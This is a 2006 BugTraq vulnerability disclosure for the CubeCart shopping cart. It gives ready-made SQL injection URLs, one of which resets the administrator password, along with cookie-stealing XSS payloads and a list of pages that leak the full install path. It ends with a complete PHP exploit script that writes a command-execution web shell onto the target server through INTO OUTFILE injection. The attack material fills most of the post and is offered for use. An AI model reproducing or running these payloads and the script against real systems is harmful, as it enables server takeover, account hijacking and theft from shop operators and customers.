BugTraq
CubeCart Multiple input Validation vulnerabilities Sep 26 2006 03:53AM
security soqor net
Hello,,

CubeCart Multiple input Validation vulnerabilities

Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : security (at) soqor (dot) net [email concealed]

Sql injection

admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*

it will reset the password for the administrator

--

admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
,31,32,33,34,35,36,37,38,39,40,41,42/*

--

view_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,
13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

--

view_doc.php?view_doc=-1'%20union%20select%201,2/*

--

admin/print_order.php?order_id='%20union%20select%201,2,3,4,5,6,7,8,9,10
,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30/*

/***************************************/

xss

admin/print_order.php?order_id=<script>alert(document.cookie);</script>

--

view_order.php?order_id=<script>alert(document.cookie);</script>

--

admin/nav.php?site_url="><script>alert(document.cookie);</script><noscri
pt>

admin/nav.php?la_search_home=<script>alert(document.cookie);</script>

and language variables for this file ..

--

admin/image.php?image=<script>alert(document.cookie);</script>

--

admin/header.inc.php?site_name=</title><script>alert(document.cookie);</
script>

admin/header.inc.php?la_adm_header=</title><script>alert(document.cookie
);</script>

admin/header.inc.php?charset='><script>alert(document.cookie);</script>

and all other variables in this file

--

footer.inc.php?la_pow_by=<script>alert(document.cookie);</script>

--

header.inc.php?site_name=</title><script>alert(document.cookie);</script
>

and all other variables in the file.

--

/***************************************/

Full path

information.php

language.php

link_navi.php?cat_id=1

list_docs.php

popular_prod.php

sale.php

check_sum.php

spotlight.php

cat_navi.php

/***************************************/

Exploit :-

#!/usr/bin/php -q -d short_open_tag=on

<?

/*

/* CubeCart Remote sql injection exploit

/* By : HACKERS PAL

/* WwW.SoQoR.NeT

/*

/* Tested on CubeCart 2.0.X and maybe other versions are injected

*/

print_r('

/**********************************************/

/* CubeCart Remote sql injection exploit */

/* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */

/* site: http://www.soqor.net */');

if ($argc<2) {

print_r('

/* -- */

/* Usage: php '.$argv[0].' host

/* Example: */

/* php '.$argv[0].' http://localhost/CubeCart/

/**********************************************/

');

die;

}

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

$url=$argv[1];

$exploit1="/cat_navi.php";

Function get_page($url)

{

if(function_exists("file_get_contents"))

{

$contents = file_get_contents($url);

}

else

{

$fp=fopen("$url","r");

while($line=fread($fp,1024))

{

$contents=$contents.$line;

}

}

return $contents;

}

$page = get_page($url.$exploit1);

$pa=explode("<b>",$page);

$pa=explode("</b>",$pa[2]);

$path = str_replace("cat_navi.php","",$pa[0])."soqor.php";

$var='\ ';

$var = str_replace(" ","",$var);

$path = str_replace($var,"/",$path);

$exploit2="/view_doc.php?view_doc=-1'%20union%20select%20'<?php%20system
(".'$_GET[cmd]'.");%20?>','WwW.SoQoR.NeT'%20INTO%20OUTFILE%20'$path'%20f
rom%20store_docs/*";

$page_now = get_page($url.$exploit2);

if(ereg("mysql_fetch_array()",$page_now))

{

$newurl=$url."/soqor.php?cmd=id";

Echo "\n[+] Go TO ".str_replace("//","/",$newurl)."\n[+] Change id to any command you want :)";

}

else

{

Echo "\n[-] Exploit Faild";

}

Die("\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");

?>

#WwW.SoQoR.NeT

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus